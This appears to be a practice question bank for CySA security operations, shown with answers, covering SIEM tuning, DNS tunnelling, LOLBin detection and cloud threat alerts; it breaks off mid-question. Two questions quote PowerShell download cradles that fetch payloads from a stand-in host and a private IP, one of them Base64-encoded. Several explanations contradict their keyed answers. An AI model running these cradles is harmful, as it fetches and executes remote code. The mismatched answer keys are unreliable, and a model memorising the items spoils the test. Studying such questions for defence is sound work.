CCNA Cysa Security Operations Questions

75 of 165 questions · Page 1/3 · Cysa Security Operations topic · Answers revealed

1
MCQeasy

During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?

A.Normal DNS resolution
B.Beaconing to command and control
C.Data exfiltration via DNS tunnelling
D.HTTP smuggling attack
AnswerC

Encrypted traffic on TCP/53 is a classic sign of DNS tunnelling for data exfiltration.

Why this answer

Port 53 is used for DNS, which typically uses UDP. Encrypted traffic on TCP/53 suggests DNS tunnelling, where data is exfiltrated inside DNS queries and responses.

2
MCQmedium

An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?

A.Increase the threshold to 500 connections per minute
B.Change the rule to alert on inbound connections
C.Disable the alert rule
D.Create an exception for the web server's IP
AnswerA

A higher threshold accommodates legitimate traffic.

Why this answer

Adjusting the threshold to a higher number that accounts for normal web server traffic will reduce false positives while still detecting scanning behavior.

3
MCQmedium

A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?

A.Authentication logs and firewall logs
B.Authentication logs and DNS logs
C.Firewall logs and IDS logs
D.Endpoint logs and cloud audit logs
AnswerA

Authentication logs provide the login events, and firewall logs provide the source IPs to correlate and identify brute-force sources.

Why this answer

Authentication logs show login attempts, and firewall logs show source IPs; combining them can detect multiple failed logins from an IP.

4
MCQeasy

An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?

A.AWS Config
B.AWS GuardDuty
C.AWS CloudTrail
D.AWS Inspector
AnswerB

Correct. GuardDuty is a threat detection service.

Why this answer

AWS GuardDuty is a threat detection service that monitors for malicious activity, including suspicious API calls and credential compromise.

5
MCQhard

A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?

A.Scheduled task creation
B.Process hollowing
C.DLL side-loading via rundll32
D.WMI persistence
AnswerC

Correct. Rundll32 is used to load DLLs, and winword.exe as parent suggests malicious macro.

Why this answer

Rundll32.exe is a known LOLBin that can be used to execute DLLs. When spawned from winword.exe, it often indicates a macro-based attack loading a remote payload.

6
MCQeasy

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

A.CASB alert investigation
B.Vulnerability scan result
C.Cloud audit log analysis
D.Threat intelligence finding
AnswerD

GuardDuty uses threat intelligence to identify C2 communication.

Why this answer

GuardDuty detects threats based on known malicious IPs, so communication with a C2 IP is a security finding indicating a potential compromise.

7
Multi-Selectmedium

A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)

Select 2 answers
A.Cloud audit logs for the user's recent activity
B.VPN logs to see if the user connected via a VPN
C.Authentication logs to verify the source IP and timestamp
D.Threat intelligence feeds for the source IP reputation
E.Device compliance status of the user's endpoint
AnswersC, D

Correct. They provide details of the login event.

Why this answer

Authentication logs show the source IP and timestamp, and threat intelligence can reveal if the IP is known malicious. Device compliance may be irrelevant, and VPN logs could explain the location.

8
Multi-Selectmedium

A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?

Select 2 answers
A.Aggregate alerts by source IP and time window
B.Disable the rule entirely
C.Whitelist IP addresses of internal services that generate repeated failed logins
D.Increase the alert severity threshold
E.Increase the log retention period
AnswersA, C

This groups multiple attempts into one alert, reducing noise.

Why this answer

Aggregating alerts by source IP reduces noise from individual attempts. Whitelisting known service accounts performing repeated failed logins (due to misconfigured services) also reduces false positives.

9
MCQhard

A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?

A.Enable multi-factor authentication for all users
B.Block the source IP address in the security group
C.Remove the instance from the auto-scaling group
D.Disable the SSH service on the instance
AnswerB

Blocking the source IP stops the attack without disrupting legitimate traffic.

Why this answer

The best initial action is to block the source IP address at the security group or network ACL to stop the brute force attack, then investigate further.

10
MCQeasy

Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?

A.They are less likely to crash services
B.They provide more accurate results by checking internal configurations
C.They are faster and less intrusive
D.They do not require network access
AnswerB

Credentialed scans can verify patch levels and settings.

Why this answer

Credentialed scans can access the OS and applications, allowing deeper inspection of installed software, patches, and configuration settings.

11
MCQeasy

A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?

A.Increase the severity of the alert
B.Reclassify the alert as a true positive
C.Create a suppression rule for that event ID
D.Disable the SIEM correlation engine
AnswerC

Suppressing known false positives reduces noise.

Why this answer

True positive alerts are genuine threats; false positives are benign. Tuning the SIEM to suppress known false positives reduces alert fatigue.

12
MCQmedium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?

A.Port scanning activity
B.Command and control beaconing
C.Data exfiltration via DNS tunnelling
D.Lateral movement using SMB
AnswerB

Correct. This matches C2 behavior.

Why this answer

Repeated connections to a known malicious IP on a non-standard port with encrypted payloads strongly suggest command and control (C2) beaconing.

13
MCQhard

An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?

A.Sigma rule on process creation events
B.NetFlow analysis for data volume
C.YARA rule matching on process memory
D.DNS log analysis for entropy and frequency
AnswerD

Correct. DNS log analysis can reveal DGA patterns via high-entropy domains.

Why this answer

DGA domains can be detected by analyzing DNS query patterns for algorithmic generation, often using frequency analysis or ML models.

14
MCQhard

During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?

A.Normal behavior for Windows services
B.Evidence of a DLL injection attack
C.Potential LOLBin abuse with anomalous parent-child relationship
D.Indicative of a process hollowing attack
AnswerC

Attackers often use svchost.exe as a LOLBin, and the unusual parent cmd.exe suggests malicious activity.

Why this answer

svchost.exe should normally run under SYSTEM or NETWORK SERVICE with 'services.exe' as parent. A user-level svchost.exe with cmd.exe parent indicates a potential LOLBin misuse.

15
Multi-Selectmedium

A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?

Select 3 answers
A.File size condition
B.PE import table condition
C.Hash condition
D.String condition containing the unique string
E.Module condition (e.g., pe)
AnswersA, B, D

Limiting file size helps avoid matching unrelated files of different sizes.

Why this answer

Including file size limits, a specific string, and the import table condition reduces false positives by narrowing the scope.

16
Multi-Selectmedium

A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?

Select 3 answers
A.Unusual outbound DNS queries to known malicious domains
B.An RDP connection from a domain controller to a workstation
C.Creation of a new service on a remote system using sc.exe
D.Multiple failed logins from a single workstation to many servers
E.Execution of PsExec from a non-administrative workstation
AnswersB, C, E

RDP from a domain controller to a workstation is unusual and may indicate lateral movement.

Why this answer

Lateral movement often involves remote execution tools (PsExec), remote service creation, and suspicious RDP connections.

17
Multi-Selectmedium

A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?

Select 2 answers
A.Firewall logs
B.Endpoint registry logs
C.DNS server logs
D.Authentication logs
E.NetFlow/IPFIX
AnswersC, E

DNS logs contain queried domain names and response sizes, useful for detecting tunneling.

Why this answer

DNS logs can show query patterns and payload sizes. NetFlow can show data transfer volumes. Both help confirm tunneling.

18
MCQmedium

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

A.Snort rule
B.YARA rule
C.Suricata rule
D.Sigma rule
AnswerD

Sigma rules provide a generic signature format for log events, ideal for detecting regsvr32 usage in process creation logs.

Why this answer

Sigma rules are designed for log detection across SIEMs, making them suitable for detecting specific command-line patterns like regsvr32 execution.

19
MCQmedium

A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?

A.Indicates a compromised account being used for data exfiltration
B.True positive - but only if the user has been phished
C.False positive - the user is working overtime
D.Indicates a misconfigured CASB policy
AnswerA

Correct. Unusual download volume and time suggest an attacker exfiltrating data.

Why this answer

Atypical data download from a cloud service to a personal device outside business hours is a strong indicator of data exfiltration.

20
Multi-Selecthard

An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?

Select 3 answers
A.User activity logs from the cloud application
B.Threat intelligence feeds for the source IP address
C.Firewall logs showing outbound connections
D.Vulnerability scan results for the user's workstation
E.Authentication logs from the identity provider
AnswersA, B, E

They show what actions the user performed, helping to identify anomalous behavior.

Why this answer

Authentication logs show if the login was successful and from which IP; threat intel can identify if the IP is malicious; user activity logs show behavior patterns.

21
Multi-Selectmedium

A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?

Select 2 answers
A.Review the cloud application's audit logs for file access or sharing events
B.Disable the user's account immediately
C.Reset the user's password without further analysis
D.Check the user's recent authentication logs for successful logins
E.Block all access to the cloud application from that location
AnswersA, D

Audit logs show what actions were taken, helping determine if data was exfiltrated.

Why this answer

Checking the user's recent authentication logs can confirm if the access was legitimate. Reviewing the cloud application's audit logs can provide details on the activities performed. The other options are less relevant or too broad.

22
MCQmedium

During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?

A.Check the Run registry keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
B.Review the Windows Security Event Log for event ID 4698 (scheduled task creation)
C.Examine the System event log for driver loading events
D.Analyze the application event log for error messages
AnswerB

Event ID 4698 logs when a scheduled task is created, providing evidence of persistence.

Why this answer

Scheduled tasks are stored in the Windows Task Scheduler and can be viewed via schtasks.exe, but the registry also contains persistence mechanisms. However, scheduled tasks are not primarily stored in the registry; they are in %SystemRoot%\Tasks. Alternatively, the analyst can use the Task Scheduler API.

But among the options, examining the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule' is not standard. Actually, the correct answer is to examine the Task Scheduler logs or the tasks folder. However, the question specifies registry key or log source.

The best answer is to review the Windows Security Event Log for event ID 4698 (scheduled task creation).

23
MCQeasy

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

A.Add the scanner's IP to an allowlist in the rule
B.Disable the rule permanently
C.Report the scanner as compromised
D.Increase the severity of the rule
AnswerA

Allowlisting legitimate sources reduces false positives while maintaining detection.

Why this answer

The alerts are false positives because the traffic is legitimate. The analyst should tune the rule to exclude the scanner's source IP addresses.

24
MCQhard

A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?

A.A Windows update process
B.Normal administrative activity
C.A false positive from EDR
D.Living off the land binary (LOLBin) usage
AnswerD

Attackers use LOLBins like PowerShell to blend in; svchost as parent is unusual and indicates potential abuse.

Why this answer

Svchost.exe is a legitimate Windows process, but it should not spawn PowerShell. This is an unusual parent-child relationship often indicative of lateral movement or code injection, where attackers use svchost to execute malicious code.

25
MCQmedium

A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?

A.Authentication logs
B.Cloud audit logs
C.DNS logs
D.Firewall logs
AnswerA

Authentication logs record logon attempts and can reveal pass-the-hash indicators.

Why this answer

Authentication logs (e.g., Windows Security Event ID 4624) contain details about logon types (e.g., Network logon) and account names, which are crucial for detecting pass-the-hash.

26
MCQmedium

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

A.Non-credentialed scans during business hours
B.External scans only
C.Credentialed agent-based scans during off-peak hours
D.Continuous non-credentialed scans
AnswerC

Agent-based scans reduce network load and off-peak hours minimize disruption.

Why this answer

Credentialed scans provide more accurate results by accessing the system deeply, but they can cause load. Agent-based scans reduce network load and allow scheduling, minimizing disruption.

27
MCQmedium

An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?

A.Authentication logs and user IDs
B.Firewall logs and connection timestamps
C.Endpoint logs and process creation
D.DNS logs and query types
AnswerB

Correct. Beaconing is detected by analyzing connection frequency and regularity in firewall logs.

Why this answer

Beaconing involves periodic outbound connections, so firewall logs (source IP, destination IP, destination port) and connection timestamps are essential for detecting regularity.

28
MCQeasy

An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?

A.tcpdump
B.netstat
C.iperf
D.nmap
AnswerA

tcpdump is the standard CLI tool for packet capture on Linux.

Why this answer

tcpdump is a powerful command-line packet analyzer for Linux, capable of capturing network traffic in real time and saving it for later analysis.

29
MCQmedium

A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?

A.Create a new security group allowing SSH only from known IPs and attach it to the instance
B.Terminate the EC2 instance immediately
C.Disable the GuardDuty alert to reduce noise
D.Install a host-based firewall on the instance to block SSH
AnswerA

This reduces exposure while maintaining necessary access.

Why this answer

The instance is exposed to the internet on SSH. Restricting SSH access to known IP addresses reduces the attack surface. Creating a new security group with a narrow source range and applying it stops brute force attempts.

30
MCQmedium

During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?

A.Fast flux
B.DNS cache poisoning
C.DNS tunneling
D.Domain Generation Algorithm (DGA)
AnswerD

Random high-entropy subdomains are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) generate many random domain names to evade blocklists. C2 malware often uses DGAs.

31
MCQeasy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?

A.Accept the risk due to compensating controls.
B.Disable the WAF to test the vulnerability.
C.Immediately patch the server during business hours.
D.Run an uncredentialed scan to confirm the vulnerability.
AnswerA

The WAF mitigates the vulnerability, so risk acceptance is appropriate with documentation.

Why this answer

Compensating controls like a WAF that effectively blocks the attack reduce the risk. While patching is ideal, the vulnerability may not be immediately exploitable due to the WAF.

32
Multi-Selecthard

A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?

Select 3 answers
A.Network connections (netstat)
B.Windows Event Logs for WMI activity
C.File system for malicious executables
D.Registry hives for persistence
E.Security Event Logs (logon events)
AnswersA, B, E

Active network connections can indicate remote access tools.

Why this answer

Security Event Logs (Event ID 4624) show logon sessions, network connections show remote access, and WMI Activity logs can indicate lateral movement via WMI.

33
Multi-Selecthard

A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?

Select 3 answers
A.Large DNS payload sizes
B.DNS responses with NXDOMAIN for most queries
C.Non-standard record types such as TXT or NULL
D.High frequency of DNS queries to a single domain
E.Use of standard A record queries
AnswersA, C, D

Typical DNS queries are small; large payloads suggest data encoding.

Why this answer

DNS tunneling often involves large payloads, high query volume to a single domain, and non-standard record types to encode data.

34
MCQmedium

A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?

A.A high number of NXDOMAIN responses
B.Unusually long subdomain names with high query frequency to a single domain
C.Consistent query intervals to a known legitimate domain
D.Queries to domains that are less than 24 hours old
AnswerB

Long subdomains with high frequency are classic tunneling indicators.

Why this answer

DNS tunneling encodes data in subdomains, resulting in long, random-looking domain names with high query volumes to a specific domain.

35
MCQmedium

A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?

A.Accept the risk and document the compensating control
B.Remove the WAF to allow the vulnerability to be exploited
C.Immediately patch the server
D.Mark the vulnerability as a false positive
AnswerA

When a compensating control is effective, risk acceptance is appropriate.

Why this answer

Compensating controls like a WAF can justify accepting the risk rather than immediately patching if it would cause downtime.

36
MCQmedium

A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?

A.Compromised AWS credentials
B.Configuration drift
C.Service outage
D.Valid administrative activity
AnswerA

Attackers often use compromised keys to spin up resources for cryptomining.

Why this answer

Unauthorized API calls to create resources in unusual regions often indicate compromised credentials or an attacker using the account for cryptomining.

37
MCQhard

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

A.PowerShell download cradle
B.WMI persistence
C.Scheduled task creation
D.DLL side-loading
AnswerA

PowerShell is used to download and save a payload, a common LOLBin technique.

Why this answer

The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.

38
MCQeasy

A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?

A.Denial-of-service attack
B.Port scanning
C.Normal backup operation
D.Data exfiltration
AnswerD

Unusual outbound data transfer on encrypted channel is a classic exfiltration indicator.

Why this answer

Large data transfers to an external IP on an encrypted channel (HTTPS) during off-hours is a common indicator of data exfiltration.

39
MCQeasy

Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?

A.Scheduled Task
B.Run key
C.Service
D.Startup folder
AnswerB

Run keys in Registry execute programs at logon.

Why this answer

The 'Run' registry key is commonly used to launch programs automatically at user logon, making it a persistence mechanism.

40
MCQmedium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?

A.Increase the alert threshold to 10 GB in 5 minutes.
B.Create a correlation rule that combines this alert with other indicators.
C.Disable the alert rule permanently.
D.Add the destination IP to a whitelist in the SIEM rule.
AnswerD

Whitelisting legitimate IPs reduces false positives while maintaining detection for other IPs.

Why this answer

The alert is a false positive because legitimate activity triggered it. The best approach is to tune the rule to exclude known cloud storage IP addresses or increase the threshold to reduce noise while still detecting true exfiltration.

41
MCQmedium

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

A.Add an exclusion list for known good command-line arguments or parent processes
B.Change the rule to trigger only on network connections from rundll32.exe
C.Disable the rule entirely
D.Increase the severity threshold of the rule
AnswerA

Excluding known legitimate activity reduces false positives while keeping the rule active.

Why this answer

Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. However, the best approach is to modify the rule to include specific conditions such as parent process or command-line arguments that indicate malicious activity.

42
MCQeasy

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

A.Create a new IAM role for the instance
B.Apply a restrictive security group to isolate the instance
C.Terminate the EC2 instance immediately
D.Update the route table to blackhole the traffic
AnswerB

Correct. Isolation stops traffic while preserving the instance for investigation.

Why this answer

Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.

43
MCQmedium

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

A.Domain generation algorithm (DGA)
B.DNS tunneling
C.Beaconing
D.HTTP smuggling
AnswerB

Correct. Large DNS queries with random subdomains to a fixed IP are indicative of DNS tunneling.

Why this answer

DNS tunneling uses the DNS protocol to exfiltrate data by encoding it in DNS queries, often with random-looking subdomains.

44
Multi-Selecthard

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Select 3 answers
A.List of installed updates
B.Scheduled tasks
C.ARP cache
D.Service configuration
E.Registry Run keys
AnswersB, D, E

Attackers often create scheduled tasks for persistence.

Why this answer

Scheduled tasks, registry Run keys, and service configurations are common persistence locations monitored by attackers.

45
MCQhard

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

A.AWS CloudTrail
B.AWS Config
C.AWS GuardDuty
D.AWS Inspector
AnswerC

GuardDuty is designed to detect suspicious API activity.

Why this answer

AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.

46
Multi-Selectmedium

A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?

Select 2 answers
A.Registry Run keys
B.Windows Event Logs for service creation
C.Browser history
D.Scheduled tasks
E.Network connections
AnswersA, D

The command explicitly adds a Run key, so checking the registry is necessary.

Why this answer

Run keys are stored in the registry, and scheduled tasks can also be created via command line. Examining these confirms persistence.

47
MCQhard

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

A.True positive - but only if the IP is confirmed malicious
B.False positive - encoded commands are used by system administrators
C.False positive - svchost.exe commonly launches PowerShell for legitimate tasks
D.True positive - likely malicious activity using a LOLBin
AnswerD

Correct. PowerShell is a LOLBin used for execution, and svchost.exe as parent is abnormal.

Why this answer

The encoded command decodes to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', which is a download cradle. Svchost.exe spawning PowerShell with such a command is highly suspicious and indicative of a true positive.

48
Multi-Selecteasy

A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?

Select 2 answers
A.AWS Lambda
B.AWS CloudTrail
C.AWS GuardDuty
D.AWS Security Hub
E.AWS VPC Flow Logs
AnswersC, D

GuardDuty continuously monitors for malicious activity.

Why this answer

AWS GuardDuty is a threat detection service, and Security Hub aggregates security findings. Other services like CloudTrail are for logging, not primarily detection.

49
MCQmedium

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

A.Domain generation algorithm (DGA)
B.Lateral movement
C.Data exfiltration
D.Normal backup activity
AnswerC

The characteristics match data being stolen.

Why this answer

The data transfer is large, to an external IP, on an encrypted port, outside business hours, and from a server that shouldn't initiate outbound connections. This strongly suggests data exfiltration.

50
Multi-Selectmedium

An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)

Select 2 answers
A.Repeated failed logins to multiple hosts
B.High volume of DNS queries
C.SMB traffic between workstations
D.SMB traffic to administrative shares (e.g., IPC$)
E.Unusual outbound connections on port 443
AnswersC, D

Lateral movement often involves SMB between workstations, not just server-to-client.

Why this answer

Lateral movement over SMB often involves file writes to admin shares (IPC$) and unusual SMB traffic patterns.

51
MCQmedium

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

A.Increase scan frequency to monitor the vulnerability
B.Mark the vulnerability as a false positive
C.Immediately shut down the system
D.Apply compensating controls and document the risk
AnswerD

Compensating controls reduce risk while awaiting a permanent fix.

Why this answer

The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.

52
MCQhard

A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?

A.Add a condition to check for a specific file size range.
B.Increase the rule's priority to avoid scanning all files.
C.Use the "pe" module to check for a specific section name.
D.Remove the "MZ" condition since all PE files have it.
AnswerA

Correct. Adding constraints like size or entry point reduces false positives.

Why this answer

Adding conditions like file size or entry point constraints narrows the rule to specific malware characteristics, reducing false positives from benign files.

53
Multi-Selectmedium

An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)

Select 2 answers
A.Remove the rule entirely because failed logins are common.
B.Add a condition that the source IP is external to the network.
C.Exclude failed logins from known administrative accounts.
D.Increase the threshold to require at least 10 failed login attempts within 5 minutes.
E.Limit the rule to logins from remote IP addresses.
AnswersB, E

Correct. External source IPs are more likely to be attackers; internal failures may be benign.

Why this answer

Limiting to remote logins reduces false positives from local console failures. Adding a threshold (e.g., >5) ensures only excessive failures alert, reducing noise from single failures.

54
MCQeasy

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

A.False positive
B.False negative
C.True positive
D.True negative
AnswerA

Correct. The alert is triggered on benign activity.

Why this answer

The alert is a false positive because the activity is legitimate despite being outside normal hours.

55
MCQeasy

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

A.Firewall logs
B.Cloud audit logs
C.DNS query logs
D.Authentication logs
AnswerC

DNS logs contain the domains being queried, enabling detection of DGA patterns.

Why this answer

DGA generates many random domain names, which are often visible in DNS query logs. Analysing DNS logs for high volumes of NXDOMAIN responses or unusual domain patterns can indicate DGA activity.

56
Multi-Selecthard

During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)

Select 3 answers
A.AppInit_DLLs
B.Service
C.Scheduled task
D.WMI event subscription
E.Registry Run key
AnswersB, C, E

Services can be created to run malicious code automatically.

Why this answer

Run keys, scheduled tasks, and services are common persistence mechanisms. Startup folders are also common but not listed as a separate option here.

57
MCQmedium

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

A.Create a SIEM correlation rule that triggers on Event ID 4104 (PowerShell Script Block Logging)
B.Perform a packet capture to analyze PowerShell network traffic
C.Deploy a YARA rule on endpoints to scan for malicious PowerShell scripts
D.Use osquery to query running PowerShell processes
AnswerA

Correct. Event ID 4104 logs PowerShell script blocks and can indicate module loading.

Why this answer

Sigma rules are designed for log-based detection and can be used to detect module loading events across multiple log sources.

58
MCQhard

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

A.Normal behavior for an administrator
B.A pass-the-hash attack
C.A user with superhuman speed
D.A false positive due to time synchronization issues
AnswerB

The attacker likely used harvested credentials from the workstation to authenticate to the server.

Why this answer

It's physically impossible to travel between buildings in one minute. The same source IP suggests a possible pass-the-hash or credential relay attack from the workstation to the server.

59
MCQmedium

A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?

A.Apply the patch immediately regardless of impact
B.Disable the server until a patch is available
C.Perform a risk assessment considering compensating controls
D.Ignore the finding because the server is internal
AnswerC

WAF and network segmentation reduce risk; a risk assessment determines the urgency.

Why this answer

CVSS score reflects severity but not exploitability in the specific environment. Considering compensating controls (WAF, network ACLs) may reduce risk, so a risk assessment is needed before patching.

60
MCQmedium

A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?

A.DNS tunneling
B.DGA
C.HTTP smuggling
D.Beaconing
AnswerA

DNS tunneling uses DNS protocol to exfiltrate data.

Why this answer

DNS tunneling encodes data in DNS queries and responses, allowing exfiltration over port 53, which is often allowed through firewalls.

61
Multi-Selecthard

During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?

Select 3 answers
A.Review EDR telemetry for file reads on sensitive documents prior to the connections
